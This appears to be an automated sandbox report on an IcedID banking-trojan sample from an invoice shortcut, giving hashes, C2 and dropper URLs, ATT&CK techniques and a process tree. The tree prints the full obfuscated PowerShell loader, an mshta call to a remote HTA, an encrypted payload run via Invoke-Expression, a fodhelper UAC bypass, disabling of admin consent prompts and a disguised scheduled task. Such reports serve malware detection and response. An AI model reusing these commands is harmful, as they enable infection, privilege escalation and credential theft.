icedid | 9646b87a32e3a271b4e36a73a8b9d1742035a0edbcdb11b00f85e3e13178a597

General

Target

Invoice_1.lnk
Size

2KB
MD5

c00c67f3de031c5ae198ba0362b5dd01
SHA1

40f3b0263f8fccdf1fd5fe287dbd55829a8eddd6
SHA256

d146c8bc52ec74b67704b30c0fb20995ba65770d191502f70c88c262dc44fc5d
SHA512

4944aa5947667500eddb4d7fed5b0a8eb4d14db1d60496fcbe38c4032511b04c92757807a23dff49353f5ee75a5ed44cc5de9ed7cdcd12b59a7b8c9214e227ad

Score

10^/10

icedid 109932505 banker evasion loader suricata trojan

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

https://conderadio.tv/09872574.hta

Extracted

Family

icedid

Campaign

109932505

C2

ilekvoyn.com

Signatures

IcedID, BokBot
IcedID is a banking trojan capable of stealing credentials.
trojan banker icedid
UAC bypass 3 TTPs
evasion trojan

Bypass User Account Control
T1088

Disabling Security Tools
T1089

Modify Registry
T1112
suricata: ET MALWARE Win32/IcedID Request Cookie
suricata: ET MALWARE Win32/IcedID Request Cookie
suricata
Blocklisted process makes network request 4 IoCs

Processes:

mshta.exepowershell.exeRundll32.exe

flow pid process

11 3768 mshta.exe
13 3768 mshta.exe
20 2284 powershell.exe
31 416 Rundll32.exe
Downloads MZ/PE file

flow	pid	process
11	3768	mshta.exe
13	3768	mshta.exe
20	2284	powershell.exe
31	416	Rundll32.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

cmd.exemshta.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation	mshta.exe

Loads dropped DLL 1 IoCs

Processes:

Rundll32.exe

pid process

416 Rundll32.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

pid	process
416	Rundll32.exe

Modifies registry class 11 IoCs

Processes:

powershell.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\ms-settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\ms-settings\Shell\Open	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute	powershell.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\ms-settings	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\ms-settings\Shell\Open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\kywdT.bat"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\ms-settings\Shell\Open\command	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\ms-settings\Shell	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\ms-settings\Shell\Open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ZDqcC.bat"	powershell.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\ms-settings\Shell\Open\command	powershell.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\ms-settings\Shell\Open	powershell.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\ms-settings\Shell	powershell.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

mshta.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	mshta.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	mshta.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exeRundll32.exe

pid	process
4128	powershell.exe
4128	powershell.exe
2284	powershell.exe
2284	powershell.exe
4224	powershell.exe
4224	powershell.exe
2348	powershell.exe
2348	powershell.exe
416	Rundll32.exe
416	Rundll32.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	4128	powershell.exe
Token: SeDebugPrivilege	2284	powershell.exe
Token: SeDebugPrivilege	4224	powershell.exe
Token: SeDebugPrivilege	2348	powershell.exe
Token: SeIncreaseQuotaPrivilege	2348	powershell.exe
Token: SeSecurityPrivilege	2348	powershell.exe
Token: SeTakeOwnershipPrivilege	2348	powershell.exe
Token: SeLoadDriverPrivilege	2348	powershell.exe
Token: SeSystemProfilePrivilege	2348	powershell.exe
Token: SeSystemtimePrivilege	2348	powershell.exe
Token: SeProfSingleProcessPrivilege	2348	powershell.exe
Token: SeIncBasePriorityPrivilege	2348	powershell.exe
Token: SeCreatePagefilePrivilege	2348	powershell.exe
Token: SeBackupPrivilege	2348	powershell.exe
Token: SeRestorePrivilege	2348	powershell.exe
Token: SeShutdownPrivilege	2348	powershell.exe
Token: SeDebugPrivilege	2348	powershell.exe
Token: SeSystemEnvironmentPrivilege	2348	powershell.exe
Token: SeRemoteShutdownPrivilege	2348	powershell.exe
Token: SeUndockPrivilege	2348	powershell.exe
Token: SeManageVolumePrivilege	2348	powershell.exe
Token: 33	2348	powershell.exe
Token: 34	2348	powershell.exe
Token: 35	2348	powershell.exe
Token: 36	2348	powershell.exe
Token: SeIncreaseQuotaPrivilege	2348	powershell.exe
Token: SeSecurityPrivilege	2348	powershell.exe
Token: SeTakeOwnershipPrivilege	2348	powershell.exe
Token: SeLoadDriverPrivilege	2348	powershell.exe
Token: SeSystemProfilePrivilege	2348	powershell.exe
Token: SeSystemtimePrivilege	2348	powershell.exe
Token: SeProfSingleProcessPrivilege	2348	powershell.exe
Token: SeIncBasePriorityPrivilege	2348	powershell.exe
Token: SeCreatePagefilePrivilege	2348	powershell.exe
Token: SeBackupPrivilege	2348	powershell.exe
Token: SeRestorePrivilege	2348	powershell.exe
Token: SeShutdownPrivilege	2348	powershell.exe
Token: SeDebugPrivilege	2348	powershell.exe
Token: SeSystemEnvironmentPrivilege	2348	powershell.exe
Token: SeRemoteShutdownPrivilege	2348	powershell.exe
Token: SeUndockPrivilege	2348	powershell.exe
Token: SeManageVolumePrivilege	2348	powershell.exe
Token: 33	2348	powershell.exe
Token: 34	2348	powershell.exe
Token: 35	2348	powershell.exe
Token: 36	2348	powershell.exe
Token: SeIncreaseQuotaPrivilege	2348	powershell.exe
Token: SeSecurityPrivilege	2348	powershell.exe
Token: SeTakeOwnershipPrivilege	2348	powershell.exe
Token: SeLoadDriverPrivilege	2348	powershell.exe
Token: SeSystemProfilePrivilege	2348	powershell.exe
Token: SeSystemtimePrivilege	2348	powershell.exe
Token: SeProfSingleProcessPrivilege	2348	powershell.exe
Token: SeIncBasePriorityPrivilege	2348	powershell.exe
Token: SeCreatePagefilePrivilege	2348	powershell.exe
Token: SeBackupPrivilege	2348	powershell.exe
Token: SeRestorePrivilege	2348	powershell.exe
Token: SeShutdownPrivilege	2348	powershell.exe
Token: SeDebugPrivilege	2348	powershell.exe
Token: SeSystemEnvironmentPrivilege	2348	powershell.exe
Token: SeRemoteShutdownPrivilege	2348	powershell.exe
Token: SeUndockPrivilege	2348	powershell.exe
Token: SeManageVolumePrivilege	2348	powershell.exe
Token: 33	2348	powershell.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

Rundll32.exe

pid process

416 Rundll32.exe

pid	process
416	Rundll32.exe

Suspicious use of WriteProcessMemory 26 IoCs

Processes:

cmd.exepowershell.exemshta.exepowershell.exefodhelper.execmd.execmd.exefodhelper.execmd.execmd.exe

description	pid	process	target process
PID 3804 wrote to memory of 4128	3804	cmd.exe	powershell.exe
PID 3804 wrote to memory of 4128	3804	cmd.exe	powershell.exe
PID 4128 wrote to memory of 3768	4128	powershell.exe	mshta.exe
PID 4128 wrote to memory of 3768	4128	powershell.exe	mshta.exe
PID 3768 wrote to memory of 2284	3768	mshta.exe	powershell.exe
PID 3768 wrote to memory of 2284	3768	mshta.exe	powershell.exe
PID 2284 wrote to memory of 3520	2284	powershell.exe	fodhelper.exe
PID 2284 wrote to memory of 3520	2284	powershell.exe	fodhelper.exe
PID 3520 wrote to memory of 3708	3520	fodhelper.exe	cmd.exe
PID 3520 wrote to memory of 3708	3520	fodhelper.exe	cmd.exe
PID 3708 wrote to memory of 1392	3708	cmd.exe	cmd.exe
PID 3708 wrote to memory of 1392	3708	cmd.exe	cmd.exe
PID 1392 wrote to memory of 4224	1392	cmd.exe	powershell.exe
PID 1392 wrote to memory of 4224	1392	cmd.exe	powershell.exe
PID 1392 wrote to memory of 3144	1392	cmd.exe	cmd.exe
PID 1392 wrote to memory of 3144	1392	cmd.exe	cmd.exe
PID 2284 wrote to memory of 2792	2284	powershell.exe	fodhelper.exe
PID 2284 wrote to memory of 2792	2284	powershell.exe	fodhelper.exe
PID 2792 wrote to memory of 3248	2792	fodhelper.exe	cmd.exe
PID 2792 wrote to memory of 3248	2792	fodhelper.exe	cmd.exe
PID 3248 wrote to memory of 3140	3248	cmd.exe	cmd.exe
PID 3248 wrote to memory of 3140	3248	cmd.exe	cmd.exe
PID 3140 wrote to memory of 2348	3140	cmd.exe	powershell.exe
PID 3140 wrote to memory of 2348	3140	cmd.exe	powershell.exe
PID 3140 wrote to memory of 760	3140	cmd.exe	cmd.exe
PID 3140 wrote to memory of 760	3140	cmd.exe	cmd.exe

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\Invoice_1.lnk
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3804

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" <#oeE'}tV41O#>$zfkmQNMMGKcDTdJr=@(30802,30808,30797,30809,30790,30725,30797,30809,30809,30805,30808,30751,30740,30740,30792,30804,30803,30793,30794,30807,30790,30793,30798,30804,30739,30809,30811,30740,30741,30750,30749,30748,30743,30746,30748,30745,30739,30797,30809,30790);<#oeE'}tV41O#>$JxXPDMbtIHLsflxCnW=@(30766,30762,30781);<#oeE'}tV41O#>function najjGYpeT($gNCFLP){$KeafQvWRzpQ=30693;<#oeE'}tV41O#>$GDaRsn=$Null;foreach($jimJcuhW in $gNCFLP){$GDaRsn+=[char]($jimJcuhW-$KeafQvWRzpQ)};return $GDaRsn};sal pQtoDlBENz (najjGYpeT $JxXPDMbtIHLsflxCnW);<#oeE'}tV41O#>pQtoDlBENz((najjGYpeT $zfkmQNMMGKcDTdJr));
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4128

C:\Windows\system32\mshta.exe
"C:\Windows\system32\mshta.exe" https://conderadio.tv/09872574.hta
3⤵
- Blocklisted process makes network request
- Checks computer location settings
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:3768

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted $ekPb = 'AAAAAAAAAAAAAAAAAAAAACfJR5/RgUWxsEG+r5tNUGQJly7FdtApxCp2Z5aZKz2HMlc4sCmUC33MZ+p06zW2cOFAVWu2ti3taj1YFtX5tInBFYtMNnK/l/vPcGRycfPq+J8HtMQFBdgT4vCybWm1mhK3dWofRMRkcgOx3as9YDB2XZT65RTRXBsG0ShBLuYWLXHO6q1DPfVScNPQciQgiWo7ApR1f9j1IwB0peeYEEwn/slnLuSflVdgjd0U/tl6fjk2/bsKAdVKCXDsA55bmUvQDVhYejRH1nvLv5mWzmjbv2Sf+Yn1FMMkiO/c8vHT+q7Z/aLaUOjdeVW4v5OQi/t9ttx94tqRO/2Db6bqK9h55Iy2ohpDMvB6IqRnJSqX6NDcbhq5ufvvUIIE+Z874s7qTLpBQosjz7WH+S2d1FiQd3Y0GVuC+vQIwxH/FQKLGoXDRhOxMjbyCaLZ1deN6a9TWrBMWseZep3lrkVMLiz7dM8z3sjKFbQgqNYFlFKjeoNZqaN0Sy9egxet/gLKK+YkB5I8aPS52sKcqW1qhLayIqaDGTdC9WoLrNYYH2a8cUWOLf9WrkIoUkuTvZMOmajmaZEwbJN5ywx7LfZel6Wvnfo/3IiKPl4184OhwTJxNPn6n0R8d2MWCKC2c3na/hgmh5tloFx6l5F3Jb95wHKk0jaezpCqnUN99ODC8oNog/iS6uGF41US7x9FTEx7qFyoFqzouh9SQBYU0pX4fWEEEnAy4lcrfIFbseIEIQsRgiwS0d71V9TsDtMHRIx0OGvgvdYW2zPB2aokPRwi0Wl2EMdZ5GetN9QQ5bHeYtY6a66RHcRMw/0S2Y+DnSepo3xYOwy87j6qXrrVWGpwvZu/+ICBMfHmiOVDd3PYTz9JsiZzs2Op4ZGu6XNCD+jGPEIdzUY2P7NagCWHue4SbUO8LnFusrHWYubHEOE6+YMZBVTWu8/B0K21umQQUEzOCIk6BmAZYliTVJI6uTKdUDkI19hO2Agrd68gk0g1u4g7p9sfwLSmO6f3924DxCwfb+ky90vwgXZPxMyWnyHmrzpdirGGXph2UgGhNqB8Ojd9AMiDy38oi9Ek5t1J3uoLrtae52EPuhf3t7BKVgshtpbCinlu9zBA7Y0b8FDWrXYZwdJa7XV3r2BZRXg845Q3JsfLxGk6FRMHhH3cfzu6YYOr8cp/zz7xslLyNyZjxVYhZjxFNny0WMfkeAhWwz+v95bWM5vuV8CgJrZfr9MmHBW+j+SfSjXPru3abj9UHrm6trr6HiQhBcuSpBg9KKmtz9UM+GvdjXUBMtA53zV7grwnXf0DbX9hoNcnX0PUT6X2RCGN9n4NLUxjcGwzJFP428aeuwdxKgEB/Knfj6YiBCSct0mIvAjx8FqVNUySwjG3Ptsy+O7lao4+CN7ifqVBfU0slUXPNSGqAk7oEVLFmC9CKyOVR7wZu4YRZBLH3FyauJvhr6rIjE+D6MMAJjrnQadDWajCvtkI+yrDoFRMrvgJMaUaVpjqhD5b5GVXDAG+to48RdJl8/VgiH191VAHnYrDvXBBc0Fpfj0oDsv06RqYK8uYJUiJgrcD/JpLrWBB6J6bCuGGoaabMU+jyFJVK4Pgtj36z0Hfwxij2L4RH/uniGTQxmSakk2evKclJ194qgQUnDT98NHGR2J48UhM2VAMYYHQbdSFMzeSFsNrmgJxZ8uUGd5Xbu6ErUhy+AABRQJ2oF+FlerQc/noT+oBj6+/J9xY5lxPmUa6s10/D78ym4aTRzH5druPf6B93MMFN9UeccrywjU4SzLij8hfbspHp6Y1hxh8rzI+cNKShUYvKbfCTTE2sQGLxI3xa7FsxKWGOxfk9d62xk4Y9uAqtFDlk4HEmf7t67pxmXx1KcEz03+RIY+LJLw10WpxwtFYLZt4JhjWx/LQ+TKxm1h29BDxbQHyjg4+GZ/BX2eU5r4ursNuk543CQNUoIuifCbymlwUi0jtOcXPTwTKiNA7M3/8/mvw1MS5P8tiQITcBSJeIBZcFkwVXGyrxxoJTEwjqoSktn8xP2B2Y0Ncam6Dmn65QIIgaucPaLqqLNWHfiFvACmt12aQ7h0EpN86adKbZiMMCctw/hBX4QgfgoJycA==';$tPFOxUIgHD = 'U3FHZEtYZHBWcHZaQ09TR1JSell1ZmhUWktOemhReEc=';$CBMKxSfhg = New-Object 'System.Security.Cryptography.AesManaged';$CBMKxSfhg.Mode = [System.Security.Cryptography.CipherMode]::ECB;$CBMKxSfhg.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$CBMKxSfhg.BlockSize = 128;$CBMKxSfhg.KeySize = 256;$CBMKxSfhg.Key = [System.Convert]::FromBase64String($tPFOxUIgHD);$ddnEW = [System.Convert]::FromBase64String($ekPb);$kAbSPqMWQ = $ddnEW[0..15];$CBMKxSfhg.IV = $kAbSPqMWQ;$AUXAiVjEXOpkNt = $CBMKxSfhg.CreateDecryptor();$XPnBMtsJXxDfbSw = $AUXAiVjEXOpkNt.TransformFinalBlock($ddnEW, 16, $ddnEW.Length - 16);$CBMKxSfhg.Dispose();$GDDbozdXrwaw = New-Object System.IO.MemoryStream( , $XPnBMtsJXxDfbSw );$DuRHh = New-Object System.IO.MemoryStream;$qYlxsgnfBTqatvQswW = New-Object System.IO.Compression.GzipStream $GDDbozdXrwaw, ([IO.Compression.CompressionMode]::Decompress);$qYlxsgnfBTqatvQswW.CopyTo( $DuRHh );$qYlxsgnfBTqatvQswW.Close();$GDDbozdXrwaw.Close();[byte[]] $qDmVNkk = $DuRHh.ToArray();$liVTzN = [System.Text.Encoding]::UTF8.GetString($qDmVNkk);Invoke-Expression($liVTzN)
4⤵
- Blocklisted process makes network request
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2284

C:\Windows\System32\fodhelper.exe
"C:\Windows\System32\fodhelper.exe"
5⤵
- Suspicious use of WriteProcessMemory
PID:3520

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZDqcC.bat" "
6⤵
- Suspicious use of WriteProcessMemory
PID:3708

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ZDqcC.bat" *
7⤵
- Suspicious use of WriteProcessMemory
PID:1392

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy UnRestricted Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0
8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4224

C:\Windows\system32\cmd.exe
cmd /c del "C:\Users\Admin\AppData\Local\Temp\ZDqcC.bat"
8⤵
PID:3144

C:\Windows\System32\fodhelper.exe
"C:\Windows\System32\fodhelper.exe"
5⤵
- Suspicious use of WriteProcessMemory
PID:2792

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\kywdT.bat" "
6⤵
- Suspicious use of WriteProcessMemory
PID:3248

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\kywdT.bat" *
7⤵
- Suspicious use of WriteProcessMemory
PID:3140

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe function tXIPlkvsktLPL ($hyUQNAjDGWycUo){ $mXzmkJZcEjqHY = 'Core update check'; $MAVXCzBKIjuPJeFnAJ = @{ Action = (New-ScheduledTaskAction -Execute "Rundll32.exe" -Argument ' C:\Users\Admin\AppData\Local\Temp\1.dll,DllRegisterServer'); Trigger = (New-ScheduledTaskTrigger -Once -At(Get-Date).AddSeconds(5)); TaskName = $mXzmkJZcEjqHY; Description = 'Core updating process.'; TaskPath = 'UpdateCheck'; RunLevel = 'Highest'}; Register-ScheduledTask @MAVXCzBKIjuPJeFnAJ -Force}; tXIPlkvsktLPL C:\Users\Admin\AppData\Local\Temp\1.dll
8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2348

C:\Windows\system32\cmd.exe
cmd /c del "C:\Users\Admin\AppData\Local\Temp\kywdT.bat"
8⤵
PID:760

C:\Windows\system32\Rundll32.exe
Rundll32.exe C:\Users\Admin\AppData\Local\Temp\1.dll,DllRegisterServer
1⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:416

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Bypass User Account Control

1

T1088

Defense Evasion

Bypass User Account Control

1

T1088

Disabling Security Tools

1

T1089

Modify Registry

2

T1112

Install Root Certificate

1

T1130

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
75b4b2eecda41cec059c973abb1114c0

SHA1
11dadf4817ead21b0340ce529ee9bbd7f0422668

SHA256
5540f4ea6d18b1aa94a3349652133a4f6641d456757499b7ab12e7ee8f396134

SHA512
87feaf17bd331ed6afd9079fefb1d8f5d3911ababf8ea7542be16c946301a7172a5dc46d249b2192376957468d75bf1c99752529ca77ec0aa78a8d054b3a6626

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
38626e78f952256a721176512a7f8c26

SHA1
70636067d2b0ec031d6912faba82a8665fa54a08

SHA256
ce79b9265cd36fec49cda6c92664354a8b6448bcf28bc13ff8b318b3b80c756d

SHA512
49005e71061285d59144a8551bb9b317694a64b383c64ec6e3c34308371a95b8fbac7356c2a8eb15477030f9aee10b347bca4f95601ba4b262eb3df0ec22c0d2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
0c77ce1db08e7f1b2bc9896a13b4f7a5

SHA1
3de7b852f908b16834f9484bce8eebd4d7389ec1

SHA256
dcb3cb7065cee59e6f4e62405ef4c5418a04a35a1ac04db0b846851bc7ec967f

SHA512
5244fa2ce993c07dfbbeac86360c2e49e86c0957a016624251e917223b0d1c0afd5fefdf17b397b298c194b5699c8696dd7e59f379d6eae98665be361f077b29

Download Submit
C:\Users\Admin\AppData\Local\Temp\1.dll
Filesize
718KB

MD5
5a0e570b13623c79c9261a8a2cc41f04

SHA1
10f6f208907d25f5ec39060a8576ed8387d42c0e

SHA256
3dfe63d2c9a7e2f848d2f92171cc577158318b4e9cb62e74ec603be84ba13109

SHA512
bbe98f12bbcc0820b98c329df11b20ee69cf49300c31948462978b5d9b398f62374bd2075247c87c3f916ceae89ba1e7a8bd0b76b1e3747345f12f5cb25e2c70

Download Submit
C:\Users\Admin\AppData\Local\Temp\1.dll
Filesize
718KB

MD5
5a0e570b13623c79c9261a8a2cc41f04

SHA1
10f6f208907d25f5ec39060a8576ed8387d42c0e

SHA256
3dfe63d2c9a7e2f848d2f92171cc577158318b4e9cb62e74ec603be84ba13109

SHA512
bbe98f12bbcc0820b98c329df11b20ee69cf49300c31948462978b5d9b398f62374bd2075247c87c3f916ceae89ba1e7a8bd0b76b1e3747345f12f5cb25e2c70

Download Submit
C:\Users\Admin\AppData\Local\Temp\ZDqcC.bat
Filesize
343B

MD5
8ca0985471c9c17826fab97b90f90c2e

SHA1
6dfd1040096a2215be242e4392d7a2768d067f10

SHA256
f9a6e829c29a8411f88db8a26edc1fafe70c64b0df651ad359ca944b14a17781

SHA512
539d65d7e7676e3a030de37e1339c2ddb0077db3242d42e6497c66f1bc8f9fc60a00150d8c29ade40c6845e1733f4f2d4cb9f830d09969676f1d24834767cefb

Download Submit
C:\Users\Admin\AppData\Local\Temp\kywdT.bat
Filesize
692B

MD5
a9338ee7f2e9643871e016eda0ecbe1f

SHA1
66c6dc3bcd948645774778263e7c8069e340e704

SHA256
c3eecc22513eb86b258dc0bfe97a599c9c5673d86fb2d2b286a88d113f076813

SHA512
7cb76b9cfdb41e3640bbec245324ba4c05757c84d0dec7d36320ce6836a2a7868727a7add4b0b49e9126f6b3233d18c2e31649ef4015769248f6101211f4853f

Download Submit
memory/416-157-0x0000000180000000-0x0000000180009000-memory.dmp

Filesize
36KB

Download
memory/760-154-0x0000000000000000-mapping.dmp

Download
memory/1392-142-0x0000000000000000-mapping.dmp

Download
memory/2284-135-0x0000000000000000-mapping.dmp

Download
memory/2284-138-0x00007FF9ACD80000-0x00007FF9AD841000-memory.dmp

Filesize
10.8MB

Download
memory/2348-152-0x00007FF9ACD80000-0x00007FF9AD841000-memory.dmp

Filesize
10.8MB

Download
memory/2348-150-0x0000000000000000-mapping.dmp

Download
memory/2792-146-0x0000000000000000-mapping.dmp

Download
memory/3140-149-0x0000000000000000-mapping.dmp

Download
memory/3144-145-0x0000000000000000-mapping.dmp

Download
memory/3248-147-0x0000000000000000-mapping.dmp

Download
memory/3520-139-0x0000000000000000-mapping.dmp

Download
memory/3708-140-0x0000000000000000-mapping.dmp

Download
memory/3768-132-0x0000000000000000-mapping.dmp

Download
memory/4128-130-0x0000000000000000-mapping.dmp

Download
memory/4128-133-0x00007FF9AD4E0000-0x00007FF9ADFA1000-memory.dmp

Filesize
10.8MB

Download
memory/4128-131-0x00000265EAB80000-0x00000265EABA2000-memory.dmp

Filesize
136KB

Download
memory/4224-144-0x00007FF9ACD80000-0x00007FF9AD841000-memory.dmp

Filesize
10.8MB

Download
memory/4224-143-0x0000000000000000-mapping.dmp

Download

Resubmissions

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads